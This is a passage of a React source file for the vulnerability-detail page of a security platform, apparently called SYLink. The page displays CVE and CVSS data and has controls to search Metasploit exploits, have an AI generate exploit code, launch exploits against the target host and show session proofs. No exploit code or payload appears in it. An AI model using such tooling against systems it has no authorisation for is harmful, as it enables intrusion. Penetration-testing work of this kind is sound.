- Complexity: ${vulnerability.attack_complexity}
- Impact: Arbitrary code execution

**Immediate recommendation:**
Apply the security patch and set up WAF filtering rules to block exploitation attempts.

*Feel free to use the predefined actions above for more detailed analyses.*`,
        timestamp: new Date().toISOString()
      }, ...prev]);
      setAiLoading(false);
    }, 2500);
  };

  if (loading) {
    return (
      <div className="min-h-screen bg-brand-black flex items-center justify-center">
        <div className="text-center">
          <div className="w-16 h-16 border-4 border-brand-green border-t-transparent rounded-full animate-spin mx-auto mb-4"></div>
          <p className="text-gray-400">{t('vulnerabilities.details.loading')}</p>
        </div>
      </div>
    );
  }

  if (!vulnerability) {
    return (
      <div className="min-h-screen bg-brand-black p-6">
        <div className="max-w-5xl mx-auto text-center py-12">
          <AlertTriangle className="w-20 h-20 text-gray-700 mx-auto mb-4" />
          <h2 className="text-2xl font-bold text-white mb-2">{t('vulnerabilities.notFound')}</h2>
          <button onClick={() => navigate('/vulnerabilities')} className="btn-green mt-4">
            {t('vulnerabilities.backToList')}
          </button>
        </div>
      </div>
    );
  }

  return (
    <div className="min-h-screen bg-brand-black p-6">
      <div className="page-container">
      <div className="w-[85%] mx-auto space-y-6">
        {/* Header */}
        <div className="flex items-center gap-4 mb-6">
          <button
            onClick={() => navigate('/vulnerabilities')}
            className="p-2 hover:bg-brand-black-lighter rounded-lg transition-colors"
          >
            <ArrowLeft className="w-5 h-5 text-gray-400 hover:text-brand-green" />
          </button>
          <div className="flex-1">
            <div className="flex items-center gap-3 mb-2">
              <h1 className="text-3xl font-bold text-white">{vulnerability.name}</h1>
              <span className={`px-3 py-1 rounded-full text-xs font-bold border ${getSeverityColor(vulnerability.severity)}`}>
                {t(`vulnerabilities.severities.${vulnerability.severity}`)}
              </span>
            </div>
            <p className="text-gray-400">{t('vulnerabilities.cve')}: {vulnerability.cve_id} | {t('vulnerabilities.cvss')}: {vulnerability.cvss_score}</p>
          </div>
        </div>

        {/* AI LLM Assistant Section */}
        <div className="bg-gradient-to-r from-purple-900/30 via-brand-black-light to-blue-900/30 rounded-xl p-6 border border-purple-500/30">
          <div className="flex items-center gap-3 mb-6">
            <div className="w-12 h-12 rounded-full bg-gradient-to-br from-purple-500 to-blue-500 flex items-center justify-center">
              <Brain className="w-6 h-6 text-white" />
            </div>
            <div>
              <h2 className="text-xl font-bold text-white flex items-center gap-2">
                {t('vulnerabilities.aiAssistant')}
                <span className="px-2 py-0.5 bg-purple-500/20 text-purple-400 text-xs rounded-full">SYLink AI</span>
              </h2>
              <p className="text-sm text-gray-400">{t('vulnerabilities.aiAssistantDesc')}</p>
            </div>
          </div>

          {/* Actions predefinies */}
          <div className="grid grid-cols-2 md:grid-cols-3 gap-3 mb-6">
            {AI_ACTIONS.map((action) => {
              const IconComponent = action.icon;
              const colorClasses = {
                blue: 'border-blue-500/30 hover:border-blue-500 hover:bg-blue-500/10',
                red: 'border-red-500/30 hover:border-red-500 hover:bg-red-500/10',
                green: 'border-green-500/30 hover:border-green-500 hover:bg-green-500/10',
                orange: 'border-orange-500/30 hover:border-orange-500 hover:bg-orange-500/10',
                purple: 'border-purple-500/30 hover:border-purple-500 hover:bg-purple-500/10',
                yellow: 'border-yellow-500/30 hover:border-yellow-500 hover:bg-yellow-500/10'
              };
              const iconColors = {
                blue: 'text-blue-400',
                red: 'text-red-400',
                green: 'text-green-400',
                orange: 'text-orange-400',
                purple: 'text-purple-400',
                yellow: 'text-yellow-400'
              };

              return (
                <button
                  key={action.id}
                  onClick={() => handleAiAction(action.id)}
                  disabled={aiLoading}
                  className={`p-4 rounded-lg border bg-brand-black transition-all duration-200 text-left ${colorClasses[action.color]} ${
                    selectedAiAction === action.id ? 'ring-2 ring-purple-500' : ''
                  } disabled:opacity-50 disabled:cursor-not-allowed`}
                >
                  <div className="flex items-start gap-3">
                    <IconComponent className={`w-5 h-5 ${iconColors[action.color]} flex-shrink-0 mt-0.5`} />
                    <div>
                      <div className="text-white font-medium text-sm">{action.title}</div>
                      <div className="text-gray-500 text-xs mt-1">{action.description}</div>
                    </div>
                  </div>
                  {selectedAiAction === action.id && aiLoading && (
                    <div className="mt-2 flex items-center gap-2 text-purple-400 text-xs">
                      <RefreshCw className="w-3 h-3 animate-spin" />
                      {t('vulnerabilities.analyzingLabel')}
                    </div>
                  )}
                </button>
              );
            })}
          </div>

          {/* Zone de question libre */}
          <div className="flex gap-3 mb-6">
            <div className="flex-1 relative">
              <MessageSquare className="absolute left-3 top-1/2 -translate-y-1/2 w-5 h-5 text-gray-500" />
              <input
                type="text"
                value={aiQuestion}
                onChange={(e) => setAiQuestion(e.target.value)}
                onKeyPress={(e) => e.key === 'Enter' && handleAiQuestion()}
                placeholder={t('vulnerabilities.aiQueryPlaceholder')}
                className="w-full bg-brand-black border border-gray-700 rounded-lg pl-10 pr-4 py-3 text-white placeholder-gray-400 focus:border-purple-500 focus:outline-none focus:ring-1 focus:ring-purple-500"
                disabled={aiLoading}
              />
            </div>
            <button
              onClick={handleAiQuestion}
              disabled={aiLoading || !aiQuestion.trim()}
              className="px-6 py-3 bg-gradient-to-r from-purple-600 to-blue-600 hover:from-purple-700 hover:to-blue-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed transition-all"
            >
              {aiLoading ? (
                <RefreshCw className="w-5 h-5 animate-spin" />
              ) : (
                <Send className="w-5 h-5" />
              )}
            </button>
          </div>

          {/* Reponses IA */}
          {aiResponses.length > 0 && (
            <div className="space-y-4">
              <div className="flex items-center gap-2 text-gray-400 text-sm">
                <MessageSquare className="w-4 h-4" />
                <span>{t('vulnerabilities.aiResponsesCount', { count: aiResponses.length })}</span>
              </div>

              {aiResponses.map((response) => (
                <div key={response.id} className="bg-brand-black rounded-lg border border-gray-800 overflow-hidden">
                  <div className="bg-gradient-to-r from-purple-900/50 to-blue-900/50 px-4 py-3 flex items-center justify-between border-b border-gray-800">
                    <div className="flex items-center gap-2">
                      <Brain className="w-4 h-4 text-purple-400" />
                      <span className="text-white font-medium">{response.title}</span>
                    </div>
                    <span className="text-xs text-gray-500">
                      {new Date(response.timestamp).toLocaleTimeString()}
                    </span>
                  </div>
                  {response.question && (
                    <div className="px-4 py-2 bg-gray-900/50 border-b border-gray-800">
                      <span className="text-gray-400 text-sm">{t('vulnerabilities.questionLabel')} </span>
                      <span className="text-white text-sm">{response.question}</span>
                    </div>
                  )}
                  <div className="p-4">
                    <MarkdownRenderer content={response.content} variant="compact" />
                  </div>
                </div>
              ))}
            </div>
          )}
        </div>

        {/* Overview */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-brand-green/30">
          <div className="flex items-center gap-2 mb-4">
            <AlertTriangle className="w-5 h-5 text-brand-green" />
            <h2 className="text-xl font-bold text-brand-green">{t('vulnerabilities.overview')}</h2>
          </div>
          <div className="space-y-4">
            <div>
              <h3 className="text-sm font-medium text-gray-400 mb-2">{t('vulnerabilities.description')}</h3>
              <p className="text-white break-all whitespace-pre-wrap">{vulnerability.description}</p>
            </div>
            <div className="grid grid-cols-2 md:grid-cols-4 gap-4 pt-4 border-t border-gray-800">
              <div>
                <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.host')}</span>
                <span className="text-white font-mono text-sm">{vulnerability.host_ip}</span>
              </div>
              <div>
                <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.port')}</span>
                <span className="text-white font-mono text-sm">{vulnerability.port}</span>
              </div>
              <div>
                <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.service')}</span>
                <span className="text-white text-sm">{vulnerability.service}</span>
              </div>
              <div>
                <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.discoveredField')}</span>
                <span className="text-white text-sm">{new Date(vulnerability.discovered_at).toLocaleDateString()}</span>
              </div>
            </div>
          </div>
        </div>

        {/* CVSS Metrics */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-brand-green/30">
          <div className="flex items-center gap-2 mb-4">
            <Shield className="w-5 h-5 text-brand-green" />
            <h2 className="text-xl font-bold text-brand-green">{t('vulnerabilities.cvssMetrics')}</h2>
          </div>
          <div className="grid grid-cols-2 md:grid-cols-4 gap-4">
            <div>
              <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.attackVector')}</span>
              <span className="text-white text-sm">{vulnerability.attack_vector}</span>
            </div>
            <div>
              <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.attackComplexity')}</span>
              <span className="text-white text-sm">{vulnerability.attack_complexity}</span>
            </div>
            <div>
              <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.privilegesRequired')}</span>
              <span className="text-white text-sm">{vulnerability.privileges_required}</span>
            </div>
            <div>
              <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.userInteraction')}</span>
              <span className="text-white text-sm">{vulnerability.user_interaction}</span>
            </div>
          </div>
        </div>

        {/* AI Recommendations */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-red-500/30">
          <div className="flex items-center justify-between mb-4">
            <div className="flex items-center gap-2">
              <Sparkles className="w-5 h-5 text-red-400" />
              <h2 className="text-xl font-bold text-red-400">{t('vulnerabilities.aiExploitRecommendations')}</h2>
            </div>
            <button
              onClick={handleGetRecommendations}
              disabled={loadingRecommendations}
              className="px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
            >
              {loadingRecommendations ? (
                <>
                  <RefreshCw className="w-4 h-4 animate-spin" />
                  {t('vulnerabilities.analyzingLabel2')}
                </>
              ) : (
                <>
                  <Eye className="w-4 h-4" />
                  {t('vulnerabilities.viewLabel')}
                </>
              )}
            </button>
          </div>

          {recommendations ? (
            <div className="space-y-4">
              <div className="grid grid-cols-2 gap-4">
                <div className="bg-brand-black rounded-lg p-4 border border-gray-800">
                  <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.exploitabilityMetric')}</span>
                  <span className="text-red-400 font-bold text-lg">{recommendations.exploitability}</span>
                </div>
                <div className="bg-brand-black rounded-lg p-4 border border-gray-800">
                  <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.attackDifficulty')}</span>
                  <span className="text-white">{recommendations.attack_difficulty}</span>
                </div>
                <div className="bg-brand-black rounded-lg p-4 border border-gray-800">
                  <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.detectionRisk')}</span>
                  <span className="text-white">{recommendations.detection_risk}</span>
                </div>
                <div className="bg-brand-black rounded-lg p-4 border border-gray-800">
                  <span className="text-xs text-gray-500 block mb-1">{t('vulnerabilities.exploitMaturity')}</span>
                  <span className="text-white">{recommendations.exploit_maturity}</span>
                </div>
              </div>
              <div className="bg-red-500/10 border border-red-500/30 rounded-lg p-4">
                <h3 className="text-sm font-medium text-red-400 mb-2 flex items-center gap-2">
                  <AlertTriangle className="w-4 h-4" />
                  {t('vulnerabilities.riskAssessment')}
                </h3>
                <MarkdownRenderer content={recommendations.risk_assessment} variant="compact" />
              </div>
              <div>
                <h3 className="text-sm font-medium text-gray-400 mb-3">{t('vulnerabilities.aiRecommendations')}</h3>
                <ul className="space-y-2">
                  {recommendations.recommendations.map((rec, idx) => (
                    <li key={idx} className="flex items-start gap-3 text-sm text-white bg-brand-black rounded-lg p-3 border border-gray-800">
                      <span className="flex-shrink-0 w-6 h-6 rounded-full bg-red-500/20 text-red-400 flex items-center justify-center text-xs font-bold">
                        {idx + 1}
                      </span>
                      <span>{rec}</span>
                    </li>
                  ))}
                </ul>
              </div>
            </div>
          ) : loadingRecommendations ? (
            <div className="text-center py-8">
              <div className="w-12 h-12 border-4 border-red-500 border-t-transparent rounded-full animate-spin mx-auto mb-3"></div>
              <p className="text-gray-400">{t('vulnerabilities.aiAnalyzingVuln')}</p>
            </div>
          ) : (
            <div className="text-center py-8 bg-brand-black rounded-lg border border-gray-800">
              <Sparkles className="w-12 h-12 text-gray-600 mx-auto mb-3" />
              <p className="text-gray-500">{t('vulnerabilities.clickToGetRecommendations')}</p>
              <p className="text-xs text-gray-600 mt-2">{t('vulnerabilities.autoAnalysisDesc')}</p>
            </div>
          )}
        </div>

        {/* Exploits Disponibles */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-red-500/30">
          <div className="flex items-center justify-between mb-4">
            <div className="flex items-center gap-2">
              <Zap className="w-5 h-5 text-red-400" />
              <h2 className="text-xl font-bold text-red-400">{t('vulnerabilities.exploitsAvailable')}</h2>
            </div>
            <div className="flex items-center gap-2">
              {/* Bouton VOIR - Bleu */}
              <button
                onClick={handleFindExploits}
                disabled={loadingExploits}
                className="px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
              >
                {loadingExploits ? (
                  <>
                    <RefreshCw className="w-4 h-4 animate-spin" />
                    Recherche...
                  </>
                ) : (
                  <>
                    <Eye className="w-4 h-4" />
                    Voir
                  </>
                )}
              </button>
              {/* Bouton LANCER - Rouge */}
              <button
                onClick={handleExecuteExploitSearch}
                disabled={executingExploitSearch || exploits.length === 0}
                className="px-4 py-2 bg-red-600 hover:bg-red-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
                title={exploits.length === 0 ? "Cliquez d'abord sur 'Voir' pour rechercher les exploits" : "Tester les exploits sur la cible"}
              >
                {executingExploitSearch ? (
                  <>
                    <RefreshCw className="w-4 h-4 animate-spin" />
                    Test en cours...
                  </>
                ) : (
                  <>
                    <Rocket className="w-4 h-4" />
                    Lancer
                  </>
                )}
              </button>
            </div>
          </div>

          {exploits.length > 0 ? (
            <div className="space-y-3">
              {exploits.map((exploit, idx) => {
                const isExecuted = executedExploits[exploit.id];
                return (
                  <div
                    key={idx}
                    className={`bg-brand-black rounded-lg p-4 border transition-all ${
                      isExecuted
                        ? 'border-green-500/50 hover:border-green-500 cursor-pointer'
                        : 'border-gray-800 hover:border-red-500/50'
                    }`}
                    onClick={() => {
                      if (isExecuted) {
                        setSelectedAttack(executedExploits[exploit.id]);
                        setSliderOpen(true);
                      }
                    }}
                  >
                    <div className="flex items-center justify-between mb-2">
                      <div className="flex-1">
                        <div className="flex items-center gap-2 mb-1">
                          <span className="font-mono text-sm text-brand-green">{exploit.name}</span>
                          <span className={`px-2 py-0.5 text-xs rounded ${
                            exploit.rank === 'Excellent' ? 'bg-green-500/20 text-green-400' :
                            exploit.rank === 'Good' ? 'bg-blue-500/20 text-blue-400' :
                            'bg-yellow-500/20 text-yellow-400'
                          }`}>{exploit.rank}</span>
                          {isExecuted && (
                            <span className="px-2 py-0.5 text-xs rounded bg-green-500/20 text-green-400 flex items-center gap-1">
                              <CheckCircle className="w-3 h-3" />
                              {t('vulnerabilities.executedLabel')}
                            </span>
                          )}
                        </div>
                        <p className="text-xs text-gray-400">{exploit.description}</p>
                        <div className="flex items-center gap-4 mt-2 text-xs text-gray-500">
                          <span>{t('vulnerabilities.platform')}: {exploit.platform}</span>
                          <span>{t('vulnerabilities.payload')}: {exploit.payload}</span>
                        </div>
                        {isExecuted && (
                          <div className="mt-2 flex items-center gap-2 text-xs text-green-400">
                            <Eye className="w-3 h-3" />
                            <span>{t('vulnerabilities.clickToSeeDetails')}</span>
                          </div>
                        )}
                      </div>
                      <div className="flex items-center gap-2 ml-4">
                        {isExecuted && (
                          <button
                            onClick={(e) => {
                              e.stopPropagation();
                              setSelectedAttack(executedExploits[exploit.id]);
                              setSliderOpen(true);
                            }}
                            className="px-3 py-2 bg-green-600 hover:bg-green-700 text-white rounded-lg font-medium flex items-center gap-2 text-sm"
                          >
                            <Eye className="w-4 h-4" />
                            {t('vulnerabilities.detailsBtn')}
                          </button>
                        )}
                        <button
                          onClick={(e) => {
                            e.stopPropagation();
                            handleLaunchExploit(exploit.id, exploit.name);
                          }}
                          disabled={launchingExploit === exploit.id}
                          className="px-4 py-2 bg-red-600 hover:bg-red-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50"
                        >
                          {launchingExploit === exploit.id ? (
                            <>
                              <RefreshCw className="w-4 h-4 animate-spin" />
                              {t('vulnerabilities.executingExploit')}
                            </>
                          ) : (
                            <>
                              <Play className="w-4 h-4" />
                              {isExecuted ? t('vulnerabilities.relaunchBtn') : t('vulnerabilities.launchBtn')}
                            </>
                          )}
                        </button>
                      </div>
                    </div>
                  </div>
                );
              })}
            </div>
          ) : loadingExploits ? (
            <div className="text-center py-8">
              <div className="w-12 h-12 border-4 border-red-500 border-t-transparent rounded-full animate-spin mx-auto mb-3"></div>
              <p className="text-gray-400">{t('vulnerabilities.searchingMetasploitDb')}</p>
            </div>
          ) : (
            <div className="text-center py-8 bg-brand-black rounded-lg border border-gray-800">
              <Zap className="w-12 h-12 text-gray-600 mx-auto mb-3" />
              <p className="text-gray-500">{t('vulnerabilities.clickViewToSearchExploits')}</p>
              <p className="text-gray-500 text-sm mt-1">{t('vulnerabilities.thenLaunchToTest')}</p>
              <p className="text-xs text-gray-600 mt-2">{t('vulnerabilities.searchInMetasploitEtc')}</p>
            </div>
          )}
        </div>

        {/* Generate Exploit */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-red-500/30">
          <div className="flex items-center justify-between mb-4">
            <div className="flex items-center gap-2">
              <Code className="w-5 h-5 text-red-400" />
              <h2 className="text-xl font-bold text-red-400">{t('vulnerabilities.aiExploitGenerator')}</h2>
            </div>
            {/* Bouton VOIR - Bleu uniquement */}
            <button
              onClick={handleGenerateExploit}
              disabled={generatingExploit}
              className="px-4 py-2 bg-blue-600 hover:bg-blue-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50 disabled:cursor-not-allowed transition-colors"
            >
              {generatingExploit ? (
                <>
                  <RefreshCw className="w-4 h-4 animate-spin" />
                  {t('vulnerabilities.generatingExploit')}
                </>
              ) : (
                <>
                  <Eye className="w-4 h-4" />
                  {t('vulnerabilities.generateExploit')}
                </>
              )}
            </button>
          </div>

          {generatedExploit ? (
            <div className="space-y-4">
              <div className="flex items-center justify-between">
                <div className="flex items-center gap-4">
                  <span className="text-sm text-gray-400">{t('vulnerabilities.langLabel')} <span className="text-white font-medium">{generatedExploit.language}</span></span>
                  <span className="text-sm text-gray-400">{t('vulnerabilities.targetLabel2')} <span className="text-white font-mono">{vulnerability.host_ip}:{vulnerability.port}</span></span>
                </div>
                <div className="flex items-center gap-2">
                  <button
                    onClick={() => {
                      navigator.clipboard.writeText(generatedExploit.code);
                      alert(t('vulnerabilities.codeCopied'));
                    }}
                    className="text-sm text-brand-green hover:text-brand-green-light flex items-center gap-1 px-3 py-1.5 bg-brand-green/10 rounded-lg"
                  >
                    <Copy className="w-4 h-4" />
                    {t('vulnerabilities.copyCode')}
                  </button>
                  <button
                    onClick={handleLaunchGeneratedExploit}
                    disabled={launchingExploit === 'generated'}
                    className="px-4 py-1.5 bg-red-600 hover:bg-red-700 text-white rounded-lg font-medium flex items-center gap-2 disabled:opacity-50"
                  >
                    {launchingExploit === 'generated' ? (
                      <>
                        <RefreshCw className="w-4 h-4 animate-spin" />
                        {t('vulnerabilities.executingExploit')}
                      </>
                    ) : (
                      <>
                        <Play className="w-4 h-4" />
                        {t('vulnerabilities.executeOnTarget')}
                      </>
                    )}
                  </button>
                </div>
              </div>
              <pre className="bg-brand-black rounded-lg p-4 overflow-x-auto border border-gray-800 max-h-96">
                <code className="text-xs text-gray-300 font-mono">{generatedExploit.code}</code>
              </pre>
            </div>
          ) : generatingExploit ? (
            <div className="text-center py-8">
              <div className="w-12 h-12 border-4 border-red-500 border-t-transparent rounded-full animate-spin mx-auto mb-3"></div>
              <p className="text-gray-400">{t('vulnerabilities.aiGeneratingExploit')}</p>
              <p className="text-xs text-gray-500 mt-2">{t('vulnerabilities.aiExploitAnalysisDesc')}</p>
            </div>
          ) : (
            <div className="text-center py-8 bg-brand-black rounded-lg border border-gray-800">
              <Code className="w-12 h-12 text-gray-600 mx-auto mb-3" />
              <p className="text-gray-500">{t('vulnerabilities.clickGenerateExploit')}</p>
              <p className="text-gray-500 text-sm mt-1">{t('vulnerabilities.thenExecuteExploit')}</p>
              <p className="text-xs text-gray-600 mt-2">{t('vulnerabilities.autoExploitGenDesc')}</p>
            </div>
          )}

          {/* Preuves d'exploitation */}
          {exploitProofs.length > 0 && (
            <div className="mt-6 space-y-4">
              <div className="flex items-center gap-2">
                <Camera className="w-5 h-5 text-green-400" />
                <h3 className="text-lg font-bold text-green-400">{t('vulnerabilities.exploitProofs', { count: exploitProofs.length })}</h3>
              </div>

              {exploitProofs.map((proof) => (
                <div key={proof.id} className="bg-brand-black rounded-lg border border-green-500/30 overflow-hidden">
                  {/* Header de la preuve */}
                  <div className="bg-green-500/10 px-4 py-3 flex items-center justify-between border-b border-green-500/30">
                    <div className="flex items-center gap-3">
                      <div className={`w-3 h-3 rounded-full ${proof.status === 'success' ? 'bg-green-500 animate-pulse' : 'bg-red-500'}`}></div>
                      <div>
                        <span className="text-white font-medium">{proof.exploit_name}</span>
                        <span className="text-gray-400 text-sm ml-3">Session {proof.session_type} #{proof.session_id}</span>
                      </div>
                    </div>
                    <div className="text-xs text-gray-400">
                      {new Date(proof.timestamp).toLocaleString()}
                    </div>
                  </div>

                  {/* Info cible */}
                  <div className="px-4 py-2 bg-brand-black-lighter flex items-center gap-4 text-sm">
                    <span className="text-gray-400">{t('vulnerabilities.targetLabel')}:</span>
                    <span className="text-white font-mono">{proof.target}</span>
                    <span className={`px-2 py-0.5 rounded text-xs font-medium ${
                      proof.status === 'success' ? 'bg-green-500/20 text-green-400' : 'bg-red-500/20 text-red-400'
                    }`}>
                      {proof.status === 'success' ? t('vulnerabilities.exploitReussie') : t('vulnerabilities.exploitEchec')}
                    </span>
                  </div>

                  {/* Screenshots/Captures */}
                  <div className="p-4 space-y-4">
                    {proof.screenshots.map((screenshot, idx) => (
                      <div key={screenshot.id} className="bg-gray-900 rounded-lg overflow-hidden border border-gray-700">
                        <div className="bg-gray-800 px-3 py-2 flex items-center justify-between">
                          <div className="flex items-center gap-2">
                            <Image className="w-4 h-4 text-green-400" />
                            <span className="text-white text-sm font-medium">
                              {t('vulnerabilities.captureN', { n: idx + 1 })} {screenshot.title}
                            </span>
                          </div>
                          <span className="text-xs text-gray-500">
                            {new Date(screenshot.timestamp).toLocaleTimeString()}
                          </span>
                        </div>
                        <div className="px-3 py-2 border-b border-gray-700">
                          <p className="text-xs text-gray-400">{screenshot.description}</p>
                        </div>
                        {/* Terminal Output */}
                        <pre className="p-3 text-xs font-mono text-green-400 overflow-x-auto max-h-48 bg-black">
                          {screenshot.terminal_output}
                        </pre>
                      </div>
                    ))}
                  </div>

                  {/* Actions */}
                  <div className="px-4 py-3 bg-brand-black-lighter border-t border-gray-800 flex items-center justify-between">
                    <div className="flex items-center gap-2 text-xs text-gray-500">
                      <CheckCircle className="w-4 h-4 text-green-400" />
                      <span>{t('vulnerabilities.capturesEnregistrees', { count: proof.screenshots.length })}</span>
                    </div>
                    <div className="flex items-center gap-2">
                      <button className="px-3 py-1.5 bg-brand-green/10 text-brand-green rounded text-xs hover:bg-brand-green/20 flex items-center gap-1">
                        <Download className="w-3 h-3" />
                        {t('vulnerabilities.exportPdf')}
                      </button>
                    </div>
                  </div>
                </div>
              ))}
            </div>
          )}
        </div>

        {/* Impact Analysis Table */}
        <div className="bg-brand-black-light rounded-xl p-6 border border-orange-500/30">
          <div className="flex items-center gap-2 mb-6">
            <Target className="w-5 h-5 text-orange-400" />
            <h2 className="text-xl font-bold text-orange-400">{t('vulnerabilities.impactAnalysis')}</h2>
          </div>

          {/* Radar Chart - CVSS Visualization */}
          <div className="mb-6 bg-brand-black rounded-lg border border-gray-800 p-4">
            <div className="h-80">
              <ResponsiveContainer width="100%" height="100%">
                <RadarChart
                  data={[
                    {
                      subject: t('vulnerabilities.accessVector'),
                      value: vulnerability.attack_vector === 'Network' ? 10 :
                             vulnerability.attack_vector === 'Adjacent' ? 6 :
                             vulnerability.attack_vector === 'Local' ? 4 : 2,
                      fullMark: 10
                    },
                    {
                      subject: t('vulnerabilities.accessComplexity'),
                      value: vulnerability.attack_complexity === 'Low' ? 10 : 4,
                      fullMark: 10
                    },
                    {
                      subject: t('vulnerabilities.requiredAuth'),
                      value: vulnerability.privileges_required === 'None' ? 10 :
                             vulnerability.privileges_required === 'Low' ? 6 : 2,
                      fullMark: 10
                    },
                    {
                      subject: t('vulnerabilities.availabilityImpact'),
                      value: vulnerability.impact_availability === 'High' ? 10 :
                             vulnerability.impact_availability === 'Low' ? 5 : 2,
                      fullMark: 10
                    },
                    {
                      subject: t('vulnerabilities.integrityImpact'),
                      value: vulnerability.impact_integrity === 'High' ? 10 :
                             vulnerability.impact_integrity === 'Low' ? 5 : 2,
                      fullMark: 10
                    },
                    {
                      subject: t('vulnerabilities.confidentialityImpact'),
                      value: vulnerability.impact_confidentiality === 'High' ? 10 :
                             vulnerability.impact_confidentiality === 'Low' ? 5 : 2,
                      fullMark: 10
                    }
                  ]}
                  cx="50%"
                  cy="50%"
                  outerRadius="70%"
                >
                  <PolarGrid stroke="#374151" />
                  <PolarAngleAxis
                    dataKey="subject"
                    tick={{ fill: '#9CA3AF', fontSize: 12 }}
                  />
                  <PolarRadiusAxis
                    angle={90}
                    domain={[0, 10]}
                    tick={{ fill: '#6B7280', fontSize: 10 }}
                    tickCount={6}
                  />
                  <Radar
                    name="Impact CVE"
                    dataKey="value"
                    stroke="#84CC16"
                    fill="#84CC16"
                    fillOpacity={0.4}
                    strokeWidth={2}
                  />
                  <Legend
                    wrapperStyle={{ color: '#9CA3AF', paddingTop: '10px' }}
                  />
                </RadarChart>
              </ResponsiveContainer>
            </div>
          </div>

          <div className="overflow-hidden rounded-lg border border-gray-800">
            <table className="w-full">
              <tbody className="divide-y divide-gray-800">
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30 w-1/3">
                    {t('vulnerabilities.accessVector')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.attack_vector === 'Network'
                        ? 'bg-red-500/20 text-red-400'
                        : vulnerability.attack_vector === 'Adjacent'
                        ? 'bg-orange-500/20 text-orange-400'
                        : 'bg-yellow-500/20 text-yellow-400'
                    }`}>
                      <Globe className="w-4 h-4" />
                      {vulnerability.attack_vector === 'Network' ? t('vulnerabilities.networkInternet') :
                       vulnerability.attack_vector === 'Adjacent' ? t('vulnerabilities.adjacentNetwork') :
                       vulnerability.attack_vector === 'Local' ? t('vulnerabilities.localAccess') : vulnerability.attack_vector}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.accessComplexity')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.attack_complexity === 'Low'
                        ? 'bg-red-500/20 text-red-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      {vulnerability.attack_complexity === 'Low' ? (
                        <>
                          <AlertTriangle className="w-4 h-4" />
                          {t('vulnerabilities.complexityLow')}
                        </>
                      ) : (
                        <>
                          <Shield className="w-4 h-4" />
                          {t('vulnerabilities.complexityHigh')}
                        </>
                      )}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.requiredAuth')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.privileges_required === 'None'
                        ? 'bg-red-500/20 text-red-400'
                        : vulnerability.privileges_required === 'Low'
                        ? 'bg-yellow-500/20 text-yellow-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      <Lock className="w-4 h-4" />
                      {vulnerability.privileges_required === 'None' ? t('vulnerabilities.privNone') :
                       vulnerability.privileges_required === 'Low' ? t('vulnerabilities.privLow') :
                       vulnerability.privileges_required === 'High' ? t('vulnerabilities.privHigh') : vulnerability.privileges_required}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.userInteractionLabel')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.user_interaction === 'None'
                        ? 'bg-red-500/20 text-red-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      <Users className="w-4 h-4" />
                      {vulnerability.user_interaction === 'None' ? t('vulnerabilities.userInteractionNone') : t('vulnerabilities.userInteractionRequired')}
                    </span>
                  </td>
                </tr>
                <tr className="hover:bg-brand-black/50 transition-colors">
                  <td className="px-4 py-3 text-sm font-medium text-gray-400 bg-gray-800/30">
                    {t('vulnerabilities.confidentialityImpact')}
                  </td>
                  <td className="px-4 py-3">
                    <span className={`inline-flex items-center gap-2 px-3 py-1 rounded-full text-sm font-medium ${
                      vulnerability.impact_confidentiality === 'High'
                        ? 'bg-red-500/20 text-red-400'
                        : vulnerability.impact_confidentiality === 'Low'
                        ? 'bg-yellow-500/20 text-yellow-400'
                        : 'bg-green-500/20 text-green-400'
                    }`}>
                      <FileText className="w-4 h-4" />
                      {vulnerability.impact_confidentiality === 'High' ? t('vulnerabilities.impactFull') :
                       vulnerability.impact_confidentiality === 'Low' ? t('vulnerabilities.impactPartial') :
